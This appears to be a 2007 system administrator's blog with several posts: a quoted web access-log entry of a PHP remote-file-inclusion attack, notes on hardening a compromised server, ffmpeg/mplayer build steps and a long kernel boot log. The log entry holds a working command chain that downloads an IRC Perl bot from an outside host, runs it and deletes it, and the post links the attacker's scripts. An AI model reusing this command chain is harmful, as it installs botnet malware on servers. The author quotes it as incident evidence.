Wednesday, July 11, 2007

grep cmd access.log
Today i was inspecting the logs

189.23.39.114 - - [11/Jul/2007:03:20:43 -0400] "GET /fooo.php?fooo=http://www.freewebs.com/cuza0/tool25.dat?&cmd=cd%20/tmp;rm%20-rf%20botnet*;wget%20http://www.freewebs.com/nkparceria/botnet.txt;lwp-download%20http://www.freewebs.com/nkparceria/botnet.txt;fetch%20http://www.freewebs.com/nkparceria/botnet.txt;curl%20-o%20botnet.txt%20http://www.freewebs.com/nkparceria/botnet.txt;GET%20http://www.freewebs.com/nkparceria/botnet.txt%20>botnet.txt;lynx%20-source%20http://www.freewebs.com/nkparceria/botnet.txt%20>botnet.txt;perl%20botnet.txt;rm%20-rf%20botnet.txt* HTTP/1.1" 200 4812 "-" "Mozilla/3.0 (compatible; Indy Library)"

you can see the php code here
http://www.freewebs.com/cuza0/tool25.dat
and irc perl bot is here
http://www.freewebs.com/nkparceria/botnet.txt

Now i inform the freewebs about this hosting of the evil scripts
mplayer/ffmpeg conversion issues (compressed swf and h264)
In this part i solved some issues with decoding/encoding


1.added support for h264
http://www.videolan.org/developers/x264.html
# svn co svn://svn.videolan.org/x264/trunk x264
cd x264
./configure --prefix=/usr
make ; make install
2 wget http://ftp.debian.org/debian/pool/main/f/faad2/faad2_2.5.orig.tar.g
tar -zxvf faad2_2.5.orig.tar.gz
cd faad2-2.5/
./configure --prefix=/usr; make ; make install
3.added support in configure script for x264 and theora(ffmpeg)
apt-get install libtheora

svn checkout svn://svn.mplayerhq.hu/ffmpeg/trunk ffmpeg
./configure --prefix=/usr --enable-libamr-nb --enable-libamr-wb --enable-libogg --enable-libvorbis --enable-libgsm --enable-libxvid --enable-liba52 --enable-libmp3lame --enable-libx264 --enable-libtheora --enable-libfaad --enable-gpl --enable-shared --enable-pthreads --enable-swscaler
4. found the issue with the compiled swf
http://lists.mplayerhq.hu/pipermail/ffmpeg-user/2006-December/005587.html
5.recompiled mplayer/mencoder from svn
svn checkout svn://svn.mplayerhq.hu/mplayer/trunk mplayer
cd mplayer
./configure --prefix=/usr
make; make install

Tuesday, July 10, 2007

we secured one server for an annonymous client

The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of php based scripts intended to deface websites leveraging PHP remote file inclusion
[The box i found this tool was an old rh8.0 box with default php and httpd and allow_url_fopen on !!, solution was to compile all the newest and the greatest stable versions that works for that site
httpd-2.2.4 (latest recomeded)
mod_perl-2.0.3
php-4.4.7
tomcat-connectors-1.2.23 (mod_jk)

I  work now to upgrade  openssh to newest version http://openssh.org/
ssh should only permit access with ssh_key and not with the plain text like is configured now and access should be restrincted to a few users 
I will  continue after that with aide installation and log monitoring.
 then will install mod_security after all  http://www.securityfocus.com/infocus/1706
]

SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

technorati tags:, , , , , , , , ,

Blogged with Flock

Wednesday, July 04, 2007

compiling ffmpeg (and mplayer) with amr7 support
http://www.penguin.cz/~utx/amr
apt-get install libgsm1-dev toolame libgsm1-dev libvorbis-dev libogg-dev
apt-get install libfaad2-dev
apt-get install subversion
apt-get install libgsm1-dev libgsmme-dev
apt-get install unzip
apt-get install liba52-0.7.4-dev
apt-get install patch

wget http://downloads.xvid.org/downloads/xvidcore-1.1.2.tar.bz2
tar -jxf xvidcore-1.1.2.tar.bz2
wget http://mesh.dl.sourceforge.net/sourceforge/lame/lame-3.97.tar.gz
tar -zxvf lame-3.97.tar.gz
cd lame-3.97
./configure --prefix=/usr;make;make install
cd ..
cd xvidcore-1.1.2/build/generic/
./configure --prefix=/usr;make;make install
cd ../../../

svn checkout svn://svn.mplayerhq.hu/ffmpeg/trunk ffmpeg
cd ffmpeg/libavcodec/
mkdir amrwb_float
cd amrwb_float
wget http://www.3gpp.org/ftp/Specs/archive/26_series/26.204/26204-510.zip
unzip 26204-510.zip
unzip 26204-510_ANSI-C_source_code.zip
cd ..
mkdir amr_float
cd amr_float
wget http://www.3gpp.org/ftp/Specs/archive/26_series/26.104/26104-510.zip
unzip 26104-510.zip
unzip 26104-510_ANSI_C_source_code.zip
cd ../../
wget http://ftp.penguin.cz/pub/users/utx/amr/amrwb-7.0.0.1.tar.bz2
tar -jxvf amrwb-7.0.0.1.tar.bz2
cd amrwb-7.0.0.1
./configure --prefix=/usr ; make ; make install
wget http://ftp.penguin.cz/pub/users/utx/amr/amrnb-6.1.0.4.tar.bz2
tar -jxvf amrnb-6.1.0.4.tar.bz2
cd amrnb-6.1.0.4
./configure --prefix=/usr ; make ; make install

./configure --prefix=/usr --enable-libamr-nb --enable-libamr-wb --enable-libogg --enable-libvorbis --enable-libgsm --enable-libxvid --enable-liba52 --enable-libmp3lame --enable-gpl;
make ; make install
cd ..
wget http://www2.mplayerhq.hu/MPlayer/releases/MPlayer-1.0rc1.tar.bz2
wget http://www2.mplayerhq.hu/MPlayer/releases/codecs/essential-20061022.tar.bz2
tar -jxvf essential-20061022.tar.bz2
mkdir /usr/lib/codecs/
cd essential-20061022
mv * /usr/lib/codecs/
cd ..
cd MPlayer-1.0rc1/
./configure --prefix=/opt/mplayer
make; make install

Friday, June 29, 2007

we have one google box (search appliance) , here are the specs for an 2004 machine
8G of ddr200 ecc ram , 2x2 dual xeon server(with hyperthreading , no 64bit) , intel motherboard
5x250G IDE hardrives with 3ware raid , dual gigabit nics ,

here is dmesg output

[ 0.000000] Linux version 2.6.20-16-server (root@terranova) (gcc version 4.1.2 (Ubuntu 4.1.2-0ubuntu4)) #2 SMP Thu Jun 7 20:26:23 UTC 2007 (Ubuntu 2.6.20-16.29-server)
[ 0.000000] BIOS-provided physical RAM map:
[ 0.000000] sanitize start
[ 0.000000] sanitize end
[ 0.000000] copy_e820_map() start: 0000000000000000 size: 000000000009fc00 end: 000000000009fc00 type: 1
[ 0.000000] copy_e820_map() type is E820_RAM
[ 0.000000] copy_e820_map() start: 000000000009fc00 size: 0000000000000400 end: 00000000000a0000 type: 2
[ 0.000000] copy_e820_map() start: 00000000000f0000 size: 0000000000010000 end: 0000000000100000 type: 2
[ 0.000000] copy_e820_map() start: 0000000000100000 size: 00000000f7ef0000 end: 00000000f7ff0000 type: 1
[ 0.000000] copy_e820_map() type is E820_RAM
[ 0.000000] copy_e820_map() start: 00000000f7ff0000 size: 0000000000008000 end: 00000000f7ff8000 type: 3
[ 0.000000] copy_e820_map() start: 00000000f7ff8000 size: 0000000000008000 end: 00000000f8000000 type: 4
[ 0.000000] copy_e820_map() start: 00000000fec00000 size: 0000000000100000 end: 00000000fed00000 type: 2
[ 0.000000] copy_e820_map() start: 00000000fee00000 size: 0000000000001000 end: 00000000fee01000 type: 2
[ 0.000000] copy_e820_map() start: 00000000ffb00000 size: 0000000000100000 end: 00000000ffc00000 type: 2
[ 0.000000] copy_e820_map() start: 00000000fff80000 size: 0000000000080000 end: 0000000100000000 type: 2
[ 0.000000] copy_e820_map() start: 0000000100000000 size: 0000000108000000 end: 0000000208000000 type: 1
[ 0.000000] copy_e820_map() type is E820_RAM
[ 0.000000] BIOS-e820: 0000000000000000 - 000000000009fc00 (usable)
[ 0.000000] BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved)
[ 0.000000] BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved)
[ 0.000000] BIOS-e820: 0000000000100000 - 00000000f7ff0000 (usable)
[ 0.000000] BIOS-e820: 00000000f7ff0000 - 00000000f7ff8000 (ACPI data)
[ 0.000000] BIOS-e820: 00000000f7ff8000 - 00000000f8000000 (ACPI NVS)
[ 0.000000] BIOS-e820: 00000000fec00000 - 00000000fed00000 (reserved)
[ 0.000000] BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved)
[ 0.000000] BIOS-e820: 00000000ffb00000 - 00000000ffc00000 (reserved)
[ 0.000000] BIOS-e820: 00000000fff80000 - 0000000100000000 (reserved)
[ 0.000000] BIOS-e820: 0000000100000000 - 0000000208000000 (usable)
[ 0.000000] 7424MB HIGHMEM available.
[ 0.000000] 896MB LOWMEM available.
[ 0.000000] found SMP MP-table at 000fbe40
[ 0.000000] Entering add_active_range(0, 0, 2129920) 0 entries of 256 used
[ 0.000000] Zone PFN ranges:
[ 0.000000] DMA 0 -> 4096
[ 0.000000] Normal 4096 -> 229376
[ 0.000000] HighMem 229376 -> 2129920
[ 0.000000] early_node_map[1] active PFN ranges
[ 0.000000] 0: 0 -> 2129920
[ 0.000000] On node 0 totalpages: 2129920
[ 0.000000] DMA zone: 32 pages used for memmap
[ 0.000000] DMA zone: 0 pages reserved
[ 0.000000] DMA zone: 4064 pages, LIFO batch:0
[ 0.000000] Normal zone: 1760 pages used for memmap
[ 0.000000] Normal zone: 223520 pages, LIFO batch:31
[ 0.000000] HighMem zone: 14848 pages used for memmap
[ 0.000000] HighMem zone: 1885696 pages, LIFO batch:31
[ 0.000000] DMI 2.3 present.
[ 0.000000] ACPI: RSDP (v000 AMI ) @ 0x000faba0
[ 0.000000] ACPI: RSDT (v001 AMIINT AMIINI09 0x00000010 MSFT 0x0100000d) @ 0xf7ff0000
[ 0.000000] ACPI: FADT (v001 AMIINT AMIINI09 0x00000011 MSFT 0x0100000d) @ 0xf7ff0030
[ 0.000000] ACPI: MADT (v001 AMIINT AMIINI09 0x00000011 MSFT 0x0100000d) @ 0xf7ff00c0
[ 0.000000] ACPI: SPCR (v001 AMIINT AMIINI09 0x00000011 MSFT 0x0100000d) @ 0xf7ff0170
[ 0.000000] ACPI: DSDT (v001 INTEL PLUMAS 0x00001000 MSFT 0x0100000d) @ 0x00000000
[ 0.000000] ACPI: PM-Timer IO Port: 0x408
[ 0.000000] ACPI: Local APIC address 0xfee00000
[ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled)
[ 0.000000] Processor #0 15:2 APIC version 20
[ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
[ 0.000000] Processor #1 15:2 APIC version 20
[ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x02] enabled)
[ 0.000000] Processor #2 15:2 APIC version 20
[ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x03] enabled)
[ 0.000000] Processor #3 15:2 APIC version 20
[ 0.000000] ACPI: LAPIC_NMI (acpi_id[0xff] high edge lint[0x1])
[ 0.000000] ACPI: IOAPIC (id[0x07] address[0xfec00000] gsi_base[0])
[ 0.000000] IOAPIC[0]: apic_id 7, version 32, address 0xfec00000, GSI 0-23
[ 0.000000] ACPI: IOAPIC (id[0x08] address[0xfec82000] gsi_base[24])
[ 0.000000] IOAPIC[1]: apic_id 8, version 32, address 0xfec82000, GSI 24-47
[ 0.000000] ACPI: IOAPIC (id[0x09] address[0xfec82400] gsi_base[48])
[ 0.000000] IOAPIC[2]: apic_id 9, version 32, address 0xfec82400, GSI 48-71
[ 0.000000] ACPI: IOAPIC (id[0x0a] address[0xfec81000] gsi_base[72])
[ 0.000000] IOAPIC[3]: apic_id 10, version 255, address 0xfec81000, GSI 72-327
[ 0.000000] ACPI: IOAPIC (id[0x0b] address[0xfec81400] gsi_base[96])
[ 0.000000] IOAPIC[4]: apic_id 11, version 255, address 0xfec81400, GSI 96-351
[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
[ 0.000000] ACPI: IRQ0 used by override.
[ 0.000000] ACPI: IRQ2 used by override.
[ 0.000000] ACPI: IRQ9 used by override.
[ 0.000000] Enabling APIC mode: Flat. Using 5 I/O APICs
[ 0.000000] Using ACPI (MADT) for SMP configuration information
[ 0.000000] Allocating PCI resources starting at f8800000 (gap: f8000000:06c00000)
[ 0.000000] Detected 2595.719 MHz processor.
[ 45.626943] Built 1 zonelists. Total pages: 2113280
[ 45.626948] Kernel command line: root=UUID=1adc228a-2114-4ac8-bbfb-a89e44601ba4 ro quiet splash
[ 45.627120] mapped APIC to ffffd000 (fee00000)
[ 45.627123] mapped IOAPIC to ffffc000 (fec00000)
[ 45.627126] mapped IOAPIC to ffffb000 (fec82000)
[ 45.627128] mapped IOAPIC to ffffa000 (fec82400)
[ 45.627131] mapped IOAPIC to ffff9000 (fec81000)
[ 45.627133] mapped IOAPIC to ffff8000 (fec81400)
[ 45.627137] Enabling fast FPU save and restore... done.
[ 45.627140] Enabling unmasked SIMD FPU exception support... done.
[ 45.627152] Initializing CPU#0
[ 45.627234] PID hash table entries: 4096 (order: 12, 16384 bytes)
[ 45.629294] Console: colour VGA+ 80x25
[ 45.629839] Dentry cache hash table entries: 131072 (order: 7, 524288 bytes)
[ 45.630440] Inode-cache hash table entries: 65536 (order: 6, 262144 bytes)
[ 46.143553] Memory: 8308804k/8519680k available (2020k kernel code, 78580k reserved, 897k data, 332k init, 7471040k highmem)
[ 46.143566] virtual kernel memory layout:
[ 46.143568] fixmap : 0xfff4f000 - 0xfffff000 ( 704 kB)
[ 46.143569] pkmap : 0xffc00000 - 0xffe00000 (2048 kB)
[ 46.143570] vmalloc : 0xf8800000 - 0xffbfe000 ( 115 MB)
[ 46.143571] lowmem : 0xc0000000 - 0xf8000000 ( 896 MB)
[ 46.143572] .init : 0xc03df000 - 0xc0432000 ( 332 kB)
[ 46.143573] .data : 0xc02f9234 - 0xc03d9754 ( 897 kB)
[ 46.143575] .text : 0xc0100000 - 0xc02f9234 (2020 kB)
[ 46.143578] Checking if this processor honours the WP bit even in supervisor mode... Ok.
[ 46.286383] Calibrating delay using timer specific routine.. 5194.60 BogoMIPS (lpj=25973008)
[ 46.286438] Security Framework v1.0.0 initialized
[ 46.286450] SELinux: Disabled at boot.
[ 46.286469] Mount-cache hash table entries: 512
[ 46.286666] CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000
[ 46.286680] CPU: Trace cache: 12K uops, L1 D cache: 8K
[ 46.286684] CPU: L2 cache: 512K
[ 46.286687] CPU: Physical Processor ID: 0
[ 46.286689] CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000
[ 46.286705] Compat vDSO mapped to ffffe000.
[ 46.286710] Remapping vsyscall page to ffffe000
[ 46.286726] Checking 'hlt' instruction... OK.
[ 46.326473] SMP alternatives: switching to UP code
[ 46.326981] Early unpacking initramfs... done
[ 46.641650] ACPI: Core revision 20060707
[ 46.642803] ACPI: Looking for DSDT in initramfs... file /DSDT.aml not found, using machine DSDT.
[ 46.644271] CPU0: Intel(R) Xeon(TM) CPU 2.60GHz stepping 09
[ 46.644297] SMP alternatives: switching to SMP code
[ 46.644504] Booting processor 1/1 eip 3000
[ 46.654969] Initializing CPU#1
[ 46.805705] Calibrating delay using timer specific routine.. 5191.34 BogoMIPS (lpj=25956715)
[ 46.805715] CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000
[ 46.805725] CPU: Trace cache: 12K uops, L1 D cache: 8K
[ 46.805727] CPU: L2 cache: 512K
[ 46.805730] CPU: Physical Processor ID: 3
[ 46.805732] CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000
[ 46.806008] CPU1: Intel(R) Xeon(TM) CPU 2.60GHz stepping 09
[ 46.806028] SMP alternatives: switching to SMP code
[ 46.806087] Booting processor 2/2 eip 3000
[ 46.816474] Initializing CPU#2
[ 46.965497] Calibrating delay using timer specific routine.. 5191.35 BogoMIPS (lpj=25956780)
[ 46.965508] CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000
[ 46.965520] CPU: Trace cache: 12K uops, L1 D cache: 8K
[ 46.965523] CPU: L2 cache: 512K
[ 46.965525] CPU: Physical Processor ID: 3
[ 46.965528] CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000
[ 46.965713] CPU2: Intel(R) Xeon(TM) CPU 2.60GHz stepping 09
[ 46.965734] SMP alternatives: switching to SMP code
[ 46.965781] Booting processor 3/3 eip 3000
[ 46.976267] Initializing CPU#3
[ 47.125289] Calibrating delay using timer specific routine.. 5191.29 BogoMIPS (lpj=25956491)
[ 47.125300] CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000
[ 47.125312] CPU: Trace cache: 12K uops, L1 D cache: 8K
[ 47.125315] CPU: L2 cache: 512K
[ 47.125318] CPU: Physical Processor ID: 0
[ 47.125320] CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000
[ 47.125531] CPU3: Intel(R) Xeon(TM) CPU 2.60GHz stepping 09
[ 47.125579] Total of 4 processors activated (20768.59 BogoMIPS).
[ 47.128580] ENABLING IO-APIC IRQs
[ 47.128832] ..TIMER: vector=0x31 apic1=0 pin1=2 apic2=-1 pin2=-1
[ 47.345012] checking TSC synchronization across 4 CPUs: passed.
[ 0.029957] Brought up 4 CPUs
[ 0.091313] migration_cost=26,745
[ 0.091724] Booting paravirtualized kernel on bare hardware
[ 0.091832] Time: 12:37:21 Date: 05/28/107
[ 0.091880] NET: Registered protocol family 16
[ 0.092006] EISA bus registered
[ 0.092012] ACPI: bus type pci registered
[ 0.093994] PCI: PCI BIOS revision 2.10 entry at 0xfdb71, last bus=4
[ 0.093997] PCI: Using configuration type 1
[ 0.093998] Setting up standard PCI resources
[ 0.097709] mtrr: your CPUs had inconsistent variable MTRR settings
[ 0.097712] mtrr: probably your BIOS does not setup all CPUs.
[ 0.097714] mtrr: corrected configuration.
[ 0.102862] ACPI: Interpreter enabled
[ 0.102866] ACPI: Using IOAPIC for interrupt routing
[ 0.103417] ACPI: PCI Root Bridge [PCI0] (0000:00)
[ 0.103426] PCI: Probing PCI hardware (bus 00)
[ 0.104100] PCI quirk: region 0400-047f claimed by ICH4 ACPI/GPIO/TCO
[ 0.104105] PCI quirk: region 0500-053f claimed by ICH4 GPIO
[ 0.105118] Boot video device is 0000:01:09.0
[ 0.105152] PCI: Transparent bridge - 0000:00:1e.0
[ 0.105182] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT]
[ 0.114071] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P1._PRT]
[ 0.114416] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.P2P3._PRT]
[ 0.114574] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.P2P4._PRT]
[ 0.116958] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 *10 11 12 14 15)
[ 0.117189] ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled.
[ 0.117429] ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 *10 11 12 14 15)
[ 0.117654] ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 10 *11 12 14 15)
[ 0.117894] ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled.
[ 0.118118] ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled.
[ 0.118345] ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled.
[ 0.118572] ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 *5 6 7 10 11 12 14 15)
[ 0.118781] Linux Plug and Play Support v0.97 (c) Adam Belay
[ 0.118796] pnp: PnP ACPI init
[ 0.121606] pnp: PnP ACPI: found 11 devices
[ 0.121613] PnPBIOS: Disabled by ACPI PNP
[ 0.121697] PCI: Using ACPI for IRQ routing
[ 0.121701] PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report
[ 0.130109] NET: Registered protocol family 8
[ 0.130111] NET: Registered protocol family 20
[ 0.130123] NetLabel: Initializing
[ 0.130125] NetLabel: domain hash size = 128
[ 0.130127] NetLabel: protocols = UNLABELED CIPSOv4
[ 0.130148] NetLabel: unlabeled traffic allowed by default
[ 0.130845] PCI: Bridge: 0000:02:1d.0
[ 0.130850] IO window: b000-bfff
[ 0.130856] MEM window: fe900000-fe9fffff
[ 0.130861] PREFETCH window: fb400000-fb4fffff
[ 0.130867] PCI: Bridge: 0000:02:1f.0
[ 0.130871] IO window: a000-afff
[ 0.130876] MEM window: fd800000-fe8fffff
[ 0.130881] PREFETCH window: fb300000-fb3fffff
[ 0.130887] PCI: Bridge: 0000:00:04.0
[ 0.130890] IO window: a000-bfff
[ 0.130895] MEM window: fd800000-feafffff
[ 0.130899] PREFETCH window: fb300000-fb5fffff
[ 0.130905] PCI: Bridge: 0000:00:1e.0
[ 0.130908] IO window: 9000-9fff
[ 0.130915] MEM window: fb700000-fd7fffff
[ 0.130920] PREFETCH window: fb200000-fb2fffff
[ 0.130957] PCI: Setting latency timer of device 0000:00:1e.0 to 64
[ 0.131014] NET: Registered protocol family 2
[ 0.259740] IP route cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.259958] TCP established hash table entries: 131072 (order: 8, 1048576 bytes)
[ 0.261114] TCP bind hash table entries: 65536 (order: 7, 524288 bytes)
[ 0.261870] TCP: Hash tables configured (established 131072 bind 65536)
[ 0.261876] TCP reno registered
[ 0.289802] checking if image is initramfs... it is
[ 0.911108] Freeing initrd memory: 7346k freed
[ 0.911805] audit: initializing netlink socket (disabled)
[ 0.911824] audit(1183034242.480:1): initialized
[ 0.911929] highmem bounce pool size: 64 pages
[ 0.912115] VFS: Disk quotas dquot_6.5.1
[ 0.912144] Dquot-cache hash table entries: 1024 (order 0, 4096 bytes)
[ 0.912219] io scheduler noop registered
[ 0.912223] io scheduler anticipatory registered
[ 0.912226] io scheduler deadline registered (default)
[ 0.912243] io scheduler cfq registered
[ 0.912629] isapnp: Scanning for PnP cards...
[ 1.269346] isapnp: No Plug & Play device found
[ 1.302819] Real Time Clock Driver v1.12ac
[ 1.302884] Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing enabled
[ 1.303019] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
[ 1.303239] serial8250: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A
[ 1.304028] 00:07: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
[ 1.304411] 00:08: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A
[ 1.304723] mice: PS/2 mouse device common for all mice
[ 1.305567] RAMDISK driver initialized: 16 RAM disks of 65536K size 1024 blocksize
[ 1.305770] input: Macintosh mouse button emulation as /class/input/input0
[ 1.305824] Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2
[ 1.305830] ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx
[ 1.306122] PNP: PS/2 Controller [PNP0f03:PS2M] at 0x60,0x64 irq 12
[ 1.306126] PNP: PS/2 controller doesn't have KBD irq; using default 1
[ 1.309005] serio: i8042 KBD port at 0x60,0x64 irq 1
[ 1.309013] serio: i8042 AUX port at 0x60,0x64 irq 12
[ 1.309178] EISA: Probing bus 0 at eisa.0
[ 1.309229] EISA: Detected 0 cards.
[ 1.339451] TCP cubic registered
[ 1.339465] NET: Registered protocol family 1
[ 1.339506] Starting balanced_irq
[ 1.339518] Using IPI No-Shortcut mode
[ 1.339677] ACPI: (supports S0 S1 S4 S5)
[ 1.339728] Magic number: 11:955:633
[ 1.339847] hash matches device ptycc
[ 1.340279] Freeing unused kernel memory: 332k freed
[ 1.348236] Time: tsc clocksource has been installed.
[ 1.542559] Capability LSM initialized
[ 1.561178] device-mapper: ioctl: 4.11.0-ioctl (2006-10-12) initialised: dm-devel@redhat.com
[ 1.680290] raid5: automatically using best checksumming function: pIII_sse
[ 1.727733] pIII_sse : 3273.200 MB/sec
[ 1.727736] raid5: using function: pIII_sse (3273.200 MB/sec)
[ 1.897552] raid6: int32x1 748 MB/s
[ 2.067312] raid6: int32x2 721 MB/s
[ 2.237215] raid6: int32x4 675 MB/s
[ 2.406958] raid6: int32x8 260 MB/s
[ 2.576648] raid6: mmxx1 1430 MB/s
[ 2.746417] raid6: mmxx2 1886 MB/s
[ 2.916220] raid6: sse1x1 912 MB/s
[ 3.086013] raid6: sse1x2 1282 MB/s
[ 3.255760] raid6: sse2x1 1717 MB/s
[ 3.425540] raid6: sse2x2 2239 MB/s
[ 3.425544] raid6: using algorithm sse2x2 (2239 MB/s)
[ 3.425551] md: raid6 personality registered for level 6
[ 3.425555] md: raid5 personality registered for level 5
[ 3.425558] md: raid4 personality registered for level 4
[ 3.426077] SCSI subsystem initialized
[ 3.434145] libata version 2.20 loaded.
[ 3.440379] ata_piix 0000:00:1f.1: version 2.10ac1
[ 3.440410] ACPI: PCI Interrupt 0000:00:1f.1[A] -> GSI 18 (level, low) -> IRQ 16
[ 3.440452] PCI: Setting latency timer of device 0000:00:1f.1 to 64
[ 3.440545] ata1: PATA max UDMA/100 cmd 0x000101f0 ctl 0x000103f6 bmdma 0x0001ff00 irq 14
[ 3.440597] ata2: PATA max UDMA/100 cmd 0x00010170 ctl 0x00010376 bmdma 0x0001ff08 irq 15
[ 3.440631] scsi0 : ata_piix
[ 3.503197] usbcore: registered new interface driver usbfs
[ 3.503242] usbcore: registered new interface driver hub
[ 3.508226] usbcore: registered new device driver usb
[ 3.509901] USB Universal Host Controller Interface driver v3.0
[ 3.515734] 3ware Storage Controller device driver for Linux v1.26.02.002.
[ 3.532362] Intel(R) PRO/1000 Network Driver - version 7.3.15-k2-NAPI
[ 3.532369] Copyright (c) 1999-2006 Intel Corporation.
[ 3.605181] scsi1 : ata_piix
[ 3.954876] ata2.01: ATAPI, max UDMA/33
[ 4.144609] ata2.01: configured for UDMA/33
[ 4.153879] scsi 1:0:1:0: CD-ROM HL-DT-ST DVD-ROM GDR8164B 0L06 PQ: 0 ANSI: 5
[ 4.154537] ACPI: PCI Interrupt 0000:03:01.0[A] -> GSI 24 (level, low) -> IRQ 17
[ 4.154611] scsi_proc_hostdir_add: proc_mkdir failed for
[ 6.201591] scsi2 : 3ware Storage Controller
[ 6.201666] 3w-xxxx: scsi2: Found a 3ware Storage Controller at 0xac00, IRQ: 17.
[ 6.202101] ACPI: PCI Interrupt 0000:04:02.0[A] -> GSI 48 (level, low) -> IRQ 18
[ 6.202234] ACPI: PCI Interrupt 0000:00:1d.0[A] -> <5>scsi 2:0:0:0: Direct-Access 3ware Logical Disk 0 1.2 PQ: 0 ANSI: 0
[ 6.202243] GSI 16 (level, low) -> IRQ 19
[ 6.202255] PCI: Setting latency timer of device 0000:00:1d.0 to 64
[ 6.202263] uhci_hcd 0000:00:1d.0: UHCI Host Controller
[ 6.202476] scsi 2:0:1:0: Direct-Access 3ware Logical Disk 1 1.2 PQ: 0 ANSI: 0
[ 6.202514] uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 1
[ 6.202560] uhci_hcd 0000:00:1d.0: irq 19, io base 0x0000dc00
[ 6.202734] scsi 2:0:2:0: Direct-Access 3ware Logical Disk 2 1.2 PQ: 0 ANSI: 0
[ 6.202814] usb usb1: configuration #1 chosen from 1 choice
[ 6.202851] hub 1-0:1.0: USB hub found
[ 6.202862] hub 1-0:1.0: 2 ports detected
[ 6.202964] scsi 2:0:3:0: Direct-Access 3ware Logical Disk 3 1.2 PQ: 0 ANSI: 0
[ 6.203210] scsi 2:0:4:0: Direct-Access 3ware Logical Disk 4 1.2 PQ: 0 ANSI: 0
[ 6.215988] SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.216045] sda: Write Protect is off
[ 6.216050] sda: Mode Sense: 00 00 00 00
[ 6.216422] SCSI device sda: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.216868] SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.216906] sda: Write Protect is off
[ 6.216911] sda: Mode Sense: 00 00 00 00
[ 6.217265] SCSI device sda: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.217274] sda: sda1 sda2
[ 6.219036] sd 2:0:0:0: Attached scsi disk sda
[ 6.219474] SCSI device sdb: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.219504] sdb: Write Protect is off
[ 6.219508] sdb: Mode Sense: 00 00 00 00
[ 6.219837] SCSI device sdb: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.220202] SCSI device sdb: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.220222] sdb: Write Protect is off
[ 6.220225] sdb: Mode Sense: 00 00 00 00
[ 6.220533] SCSI device sdb: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.220537] sdb: sdb1
[ 6.227050] sd 2:0:1:0: Attached scsi disk sdb
[ 6.227468] SCSI device sdc: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.227491] sdc: Write Protect is off
[ 6.227496] sdc: Mode Sense: 00 00 00 00
[ 6.227800] SCSI device sdc: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.228141] SCSI device sdc: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.228159] sdc: Write Protect is off
[ 6.228163] sdc: Mode Sense: 00 00 00 00
[ 6.228470] SCSI device sdc: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.228474] sdc: sdc1
[ 6.232602] sd 2:0:2:0: Attached scsi disk sdc
[ 6.232999] SCSI device sdd: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.233024] sdd: Write Protect is off
[ 6.233028] sdd: Mode Sense: 00 00 00 00
[ 6.233335] SCSI device sdd: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.233672] SCSI device sdd: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.233689] sdd: Write Protect is off
[ 6.233692] sdd: Mode Sense: 00 00 00 00
[ 6.233999] SCSI device sdd: write cache: enabled, read cache: disabled, supports DPO and FUA
